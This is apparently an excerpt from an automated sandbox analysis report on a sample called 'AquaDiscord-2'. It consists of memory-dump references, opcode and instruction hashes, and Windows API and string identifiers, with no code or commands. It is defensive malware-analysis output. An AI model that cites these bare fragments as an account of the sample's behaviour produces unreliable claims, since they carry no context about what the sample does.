                                                                                          • Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                          • Instruction Fuzzy Hash: 0571F832B083358BD714CE29E88431FB7E2EBC5710FA9856EE8949B355D3389C4587DA
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909459178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909459178.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 72Y
                                                                                          • API String ID: 0-564303654
                                                                                          • Opcode ID: 5385e5880359d5ccb39f7219a55c28a6b68bb3476fdd8c12494410843071b7eb
                                                                                          • Instruction ID: 4337ef944046a775e373f072c0b24e9e38e84af2be772ab16b974ff372caf755
                                                                                          • Opcode Fuzzy Hash: 5385e5880359d5ccb39f7219a55c28a6b68bb3476fdd8c12494410843071b7eb
                                                                                          • Instruction Fuzzy Hash: 4021673454C3119BD725CF20CC51AAABBF1EF96305F008A6EE5D9A72E2D3398846C7C6
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909459178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909459178.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b5da75524e788767ec64699ac96ea130612297a95f7daa9a7f92c01636c847ed
                                                                                          • Instruction ID: beba566f0c337e03e94a8d121a5db6c50dfc4ba255997064a0c903c7420b2622
                                                                                          • Opcode Fuzzy Hash: b5da75524e788767ec64699ac96ea130612297a95f7daa9a7f92c01636c847ed
                                                                                          • Instruction Fuzzy Hash: D852F4715083458FCB14CF24C0906AABFE1BF89315F18867EF8996B391D778DA49CB89
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909459178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909459178.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5ad0fa8146068bfe6562e592e38a34688227262f4c6a26b4ec59bef795a2e62d
                                                                                          • Instruction ID: eff02e85cc14c1dea4739ce563387e8ed064339514d4c01d2dd91a6366e39f0e
                                                                                          • Opcode Fuzzy Hash: 5ad0fa8146068bfe6562e592e38a34688227262f4c6a26b4ec59bef795a2e62d
                                                                                          • Instruction Fuzzy Hash: D422A331A087118BC725DF18D9806ABB3E1BFC4319F19893ED986A7385D738B855CB87
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909459178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909459178.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 05210ab14592169525e76f698fe40e0322417d452b96810df3ed72334fa87ebf
                                                                                          • Instruction ID: e0d07545bf99c5bcf9f53104091ab12fee6b55ff989ca51c3b901817dc0cabf8
                                                                                          • Opcode Fuzzy Hash: 05210ab14592169525e76f698fe40e0322417d452b96810df3ed72334fa87ebf
                                                                                          • Instruction Fuzzy Hash: 67F1BD356087418FD724CF29C881A6BFBE2EFD9304F08882DE5D597391E639E944CB96
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909459178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909459178.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 191114f41b7dd2d43134bfb0a00d8d37a42c40c5bb86188d97d5f3937e1773dc
                                                                                          • Instruction ID: f13c2bdf90e971f3eaf5a9336ce2231f8ed65c36f054cc718fd1371a7506e679
                                                                                          • Opcode Fuzzy Hash: 191114f41b7dd2d43134bfb0a00d8d37a42c40c5bb86188d97d5f3937e1773dc
                                                                                          • Instruction Fuzzy Hash: 2DC124B0D04225CFCB10CF64D8916AEBB71FF56314F19856EE8156B396EB38AC01CB95
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909459178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909459178.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 7f284a70105d7794661198204b2091bfebd80386a1c9b8a6cacc7f5ea85886d7
                                                                                          • Instruction ID: b9b509e6e49c4d131d7aa7f7af49c179d0f0f27c0afc080723a459acff23a10c
                                                                                          • Opcode Fuzzy Hash: 7f284a70105d7794661198204b2091bfebd80386a1c9b8a6cacc7f5ea85886d7
                                                                                          • Instruction Fuzzy Hash: 93913872A442618FC7158E28CC9139B7BE2ABC5324F19863EE8B9973C1D738DC4697C5
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909459178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909459178.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: 23f17e0cdea6eb7299afad9dfaa0018a689292dc5aab41bd9922b8370519d840
                                                                                          • Instruction ID: e76f976c773fbf04b9f7327d9d466f2d567fba6bd7a1799d7739ea24fa2954c5
                                                                                          • Opcode Fuzzy Hash: 23f17e0cdea6eb7299afad9dfaa0018a689292dc5aab41bd9922b8370519d840
                                                                                          • Instruction Fuzzy Hash: 3C516B35B147019FDB188E2DEC816BBB7D2EB99320F18553EE8D587392E7389C028795
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909459178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909459178.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 23071ed7aba6299ea5a8a1138616b71056be3a4b4f8ad3feef5fae73212ecf53
                                                                                          • Instruction ID: d0aa8978018156a2f9b2c138b81b42fdf2c2dd25e4ff143a5cefdfbf7dce8a99
                                                                                          • Opcode Fuzzy Hash: 23071ed7aba6299ea5a8a1138616b71056be3a4b4f8ad3feef5fae73212ecf53
                                                                                          • Instruction Fuzzy Hash: A9716E715083849BDB148A6C8D883A77B94EF56314F18C63FE8999B3C2E3BDC905D35A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909459178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909459178.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 67541b89d1e2a790723e351c6a2256827d0579c96e035509cabc2be9ab00f357
                                                                                          • Instruction ID: 79a1c04b856af922b25cae0e034fa734e047d26e083de99eeb14b1ed38a3ff48
                                                                                          • Opcode Fuzzy Hash: 67541b89d1e2a790723e351c6a2256827d0579c96e035509cabc2be9ab00f357
                                                                                          • Instruction Fuzzy Hash: F8512A72E18B254BD7188E6DAC5023AB2D2ABC4204F8D863DDD569B385EF74AC10D7C5
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909459178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909459178.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b8a6cc2b17862459f61344c35872a97195db7e73bbb7928c48526c959f2b322d
                                                                                          • Instruction ID: b38c95726408b968969ddf6a7085e2b621652b8ebaef776a4f79e8581fab324f
                                                                                          • Opcode Fuzzy Hash: b8a6cc2b17862459f61344c35872a97195db7e73bbb7928c48526c959f2b322d
                                                                                          • Instruction Fuzzy Hash: BF3156B161C7809BE720DF25A801B9FBBB1EBD2384F408D2DD4D86A211E6398505CB5B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909459178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909459178.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: f7c56e9b388505c64ea653f2a815aa82959ae0d5801d18e48bd9a1b995f90e20
                                                                                          • Instruction ID: fb84bfcd7364cd1e02f9907049cc3bb89e5f2374717776f149e762b11120e404
                                                                                          • Opcode Fuzzy Hash: f7c56e9b388505c64ea653f2a815aa82959ae0d5801d18e48bd9a1b995f90e20
                                                                                          • Instruction Fuzzy Hash: 4321B5347186119FD71C8F2AA48193BB3B2EB86716FA0152DE59213262C73DED178BCD
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909459178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909459178.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                          • Instruction ID: 5d70dd1efbd36929d760f2f261d8bda5826f1eaaa5b95a91e4b726fde98d8be2
                                                                                          • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                          • Instruction Fuzzy Hash: 0F112933A041D50EC3128D3C84005A9BFA30BD7634F1AD39AF8B49B2D2D7268D8A9359
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909459178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909459178.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e309efab317e40e93bb7692b60289ba2d332d2c67ff9717def56087b73cb8e32
                                                                                          • Instruction ID: c8cccba91deed7ad6ce4873294a279e7cc7abd757a3d9d4cea866000f87810c8
                                                                                          • Opcode Fuzzy Hash: e309efab317e40e93bb7692b60289ba2d332d2c67ff9717def56087b73cb8e32
                                                                                          • Instruction Fuzzy Hash: 350192B1B0031147E6209E51A5C172BB2A96F80718F48443EDC0557342DB7DFC24C29B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909459178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909459178.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f0ad718d4c749f33f4747fd3987d0219820583e9f450f49e4526138e3d3856be
                                                                                          • Instruction ID: 1e6f5f065346c868a4374216e1ff8e8563d53b6b319917fc3693fb1f15cd7457
                                                                                          • Opcode Fuzzy Hash: f0ad718d4c749f33f4747fd3987d0219820583e9f450f49e4526138e3d3856be
                                                                                          • Instruction Fuzzy Hash: 9FF0E5A9B5A7418BE708DF398C5147B77F2D3DB210F19E93CC582C3354C53894428649
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909459178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909459178.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ec1440257568dcacbce9808453dc8733135d1e2a19017a23d007bafd7ccfd25d
                                                                                          • Instruction ID: a78cf1e6e0e68aebd5d0843b64b69d33ecbc022396edd014815549610411c9de
                                                                                          • Opcode Fuzzy Hash: ec1440257568dcacbce9808453dc8733135d1e2a19017a23d007bafd7ccfd25d
                                                                                          • Instruction Fuzzy Hash: 0ED05BA6C9111027D32897219D5997B75384597604B0A6A1DDC4523745E23D9C1445E9
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909459178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909459178.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a00d8186f097e825981dba5d6c4823ac2805a43ff07e82d2d035b6ae9fa46635
                                                                                          • Instruction ID: 5e988d5e729d8ceb5db615c77d7debf3ee2c932a3ab167ff4f79766e21bd48a6
                                                                                          • Opcode Fuzzy Hash: a00d8186f097e825981dba5d6c4823ac2805a43ff07e82d2d035b6ae9fa46635
                                                                                          • Instruction Fuzzy Hash: 05B0127CB4A48087C30CDF08EC51630B3F9E327394B053039940BE32A1D510D815890E
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909459178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909459178.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: Variant$ClearInit
                                                                                          • String ID: A$L$L$O$U$V$g$o$t$x$|
                                                                                          • API String ID: 2610073882-1753474633
                                                                                          • Opcode ID: 39c64bd33bd6552f2e51df1a87fd19bec2da68075fa32bf6ea1a30ab81113642
                                                                                          • Instruction ID: e93254ed8265b389484747ba7ae3652620e53d65a7222c82b7b357315d594193
                                                                                          • Opcode Fuzzy Hash: 39c64bd33bd6552f2e51df1a87fd19bec2da68075fa32bf6ea1a30ab81113642
                                                                                          • Instruction Fuzzy Hash: A741F22460C7C18ED331DB38985879BBFD16B97224F088B9DD4ED4A2D2C7784149CB23
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909459178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909459178.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocString
                                                                                          • String ID: &$0$1$=$@$A$F$I
                                                                                          • API String ID: 2525500382-2691759510
                                                                                          • Opcode ID: 6616321cee811b5abb673aa44505d5660c3c4f9db507fb7c077eb8c7dafc1005
                                                                                          • Instruction ID: 6dbe45b2a04d6db8cde2141575943bfb59b89fcd93c4d3154aa8bf0d1f5f7dca
                                                                                          • Opcode Fuzzy Hash: 6616321cee811b5abb673aa44505d5660c3c4f9db507fb7c077eb8c7dafc1005
                                                                                          • Instruction Fuzzy Hash: 1081E36150CBC28AC3268A7C588864FEFD21BE7234F584BADF1F54B3E6D2648502C767
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909459178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909459178.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocString
                                                                                          • String ID: &$0$1$=$@$A$F$I
                                                                                          • API String ID: 2525500382-2691759510
                                                                                          • Opcode ID: 059fca28d7772aa94a1e26ba6d39b749d7ebe0ed0f2a4461eba500a0b5dba51d
                                                                                          • Instruction ID: 8cc4701dd146bd2eb1350ce2bf29858de9d71db05192a895d6f482bf7fa7267d
                                                                                          • Opcode Fuzzy Hash: 059fca28d7772aa94a1e26ba6d39b749d7ebe0ed0f2a4461eba500a0b5dba51d
                                                                                          • Instruction Fuzzy Hash: 5481E46150CBD28AC3268A7C588864FFFD11AE7234F484BADF6F18B3E6D2548506C767
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909645953.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909632146.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909666742.0000000000B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909681954.0000000000B20000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909698006.0000000000B24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909712695.0000000000B27000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_af0000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressCloseFileHandleProcSize
                                                                                          • String ID: CreateFileA
                                                                                          • API String ID: 2836222988-1429953656
                                                                                          • Opcode ID: 3b3a8397c318f0ec78c903f22b217b869669ca7126df922cdef23f0b01843e77
                                                                                          • Instruction ID: 77bf83dd73c75a25759355b9e12f52bb8964868cbf928b580396b5d610c4b53e
                                                                                          • Opcode Fuzzy Hash: 3b3a8397c318f0ec78c903f22b217b869669ca7126df922cdef23f0b01843e77
                                                                                          • Instruction Fuzzy Hash: 0141B4B0D08209DFCB00EFA8D5586AEBBF0EF48314F008529E899A7350DB749949CF96
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909645953.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909632146.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909666742.0000000000B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909681954.0000000000B20000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909698006.0000000000B24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909712695.0000000000B27000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_af0000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: __freea$__alloca_probe_16$Info
                                                                                          • String ID:
                                                                                          • API String ID: 127012223-0
                                                                                          • Opcode ID: 002a847b3c3b740eca40e5c9c44b83a4c1252b3044b795f468c6c99b1fa1dcb2
                                                                                          • Instruction ID: 76f72c7b32d28c73103aa316c74637fba15b7a12b9e547d03cd3ac762f48a989
                                                                                          • Opcode Fuzzy Hash: 002a847b3c3b740eca40e5c9c44b83a4c1252b3044b795f468c6c99b1fa1dcb2
                                                                                          • Instruction Fuzzy Hash: CD71D472900209ABDF209E949C82FEF7BE9DF45710FA401A9F954B7281EB759CC18B90
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909645953.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909632146.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909666742.0000000000B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909681954.0000000000B20000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909698006.0000000000B24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909712695.0000000000B27000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_af0000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: _strrchr
                                                                                          • String ID:
                                                                                          • API String ID: 3213747228-0
                                                                                          • Opcode ID: b258c23f8f5adf4b5b829db56bad2fb8a7efe0f2db3ca2ba46b92337591bc9f9
                                                                                          • Instruction ID: b200c6c7624529dbb8f642269eca5d42bf3319bcfef39f0b48d84d043b5aa0b7
                                                                                          • Opcode Fuzzy Hash: b258c23f8f5adf4b5b829db56bad2fb8a7efe0f2db3ca2ba46b92337591bc9f9
                                                                                          • Instruction Fuzzy Hash: 1FB14772A003559FDB118F28CC81BAE7FE5EF55350F2981E5E985AB2C2DA74DE01C7A0
                                                                                          APIs
                                                                                          • _ValidateLocalCookies.LIBCMT ref: 00AFABA7
                                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 00AFABAF
                                                                                          • _ValidateLocalCookies.LIBCMT ref: 00AFAC38
                                                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 00AFAC63
                                                                                          • _ValidateLocalCookies.LIBCMT ref: 00AFACB8
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909645953.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909632146.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909666742.0000000000B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909681954.0000000000B20000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909698006.0000000000B24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909712695.0000000000B27000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_af0000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                          • String ID: csm
                                                                                          • API String ID: 1170836740-1018135373
                                                                                          • Opcode ID: 3ebc4bf872d69b71fda10cdcba23a7e60047a5fedda88edca0f75e48489dfe5b
                                                                                          • Instruction ID: fb6ad181f5d02e6a630aa44203d67373f5f9f9455d94c5d2d986c9a4bf2a4bdf
                                                                                          • Opcode Fuzzy Hash: 3ebc4bf872d69b71fda10cdcba23a7e60047a5fedda88edca0f75e48489dfe5b
                                                                                          • Instruction Fuzzy Hash: 5B41A374A0021C9BCB10DFE8C884AEE7BB5AF15314F548195F9189B392C735AE02CF92
                                                                                          APIs
                                                                                          • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,00000000,?,BB40E64E,?,00B06711,00000000,00000000,00000000,00000000), ref: 00B066C3
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909645953.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909632146.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909666742.0000000000B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909681954.0000000000B20000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909698006.0000000000B24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909712695.0000000000B27000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_af0000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: FreeLibrary
                                                                                          • String ID: api-ms-$ext-ms-
                                                                                          • API String ID: 3664257935-537541572
                                                                                          • Opcode ID: 4a1beacfa795c5919e684d086448515e70245dd28bfde8aac04fce70c41fcf83
                                                                                          • Instruction ID: 4a677b89f9c7847c04d8fcef529f25e7c1b49623d6bd1c410ee28ffd38e4a205
                                                                                          • Opcode Fuzzy Hash: 4a1beacfa795c5919e684d086448515e70245dd28bfde8aac04fce70c41fcf83
                                                                                          • Instruction Fuzzy Hash: 7C21E732A01215ABD7319B649C44ADA7FE8DB417B0F1502A0FD25A72D0EF31ED11C6D0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909645953.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909632146.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909666742.0000000000B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909681954.0000000000B20000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909698006.0000000000B24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909712695.0000000000B27000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_af0000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 98c08103a68c01aa590f0f77e7457cc9e900c3041370f441aa3dbbf0eeda4d87
                                                                                          • Instruction ID: 213a3c20e7a820e38df6642c138cb051879c18ac5eff31a8ca3ab87eb43b0bdb
                                                                                          • Opcode Fuzzy Hash: 98c08103a68c01aa590f0f77e7457cc9e900c3041370f441aa3dbbf0eeda4d87
                                                                                          • Instruction Fuzzy Hash: A3B11370A04249AFDB15DFA8C885BEE7FF1EF49700F9441D8E405A7292EB719E92CB50
                                                                                          APIs
                                                                                          • GetLastError.KERNEL32(?,?,00B04424,00AFA93D,00AF9B94), ref: 00B0443B
                                                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00B04449
                                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00B04462
                                                                                          • SetLastError.KERNEL32(00000000,00B04424,00AFA93D,00AF9B94), ref: 00B044B4
